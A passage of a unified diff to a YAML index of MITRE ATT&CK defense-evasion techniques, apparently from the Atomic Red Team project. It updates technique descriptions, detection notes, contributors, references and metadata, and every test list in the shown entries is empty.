       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
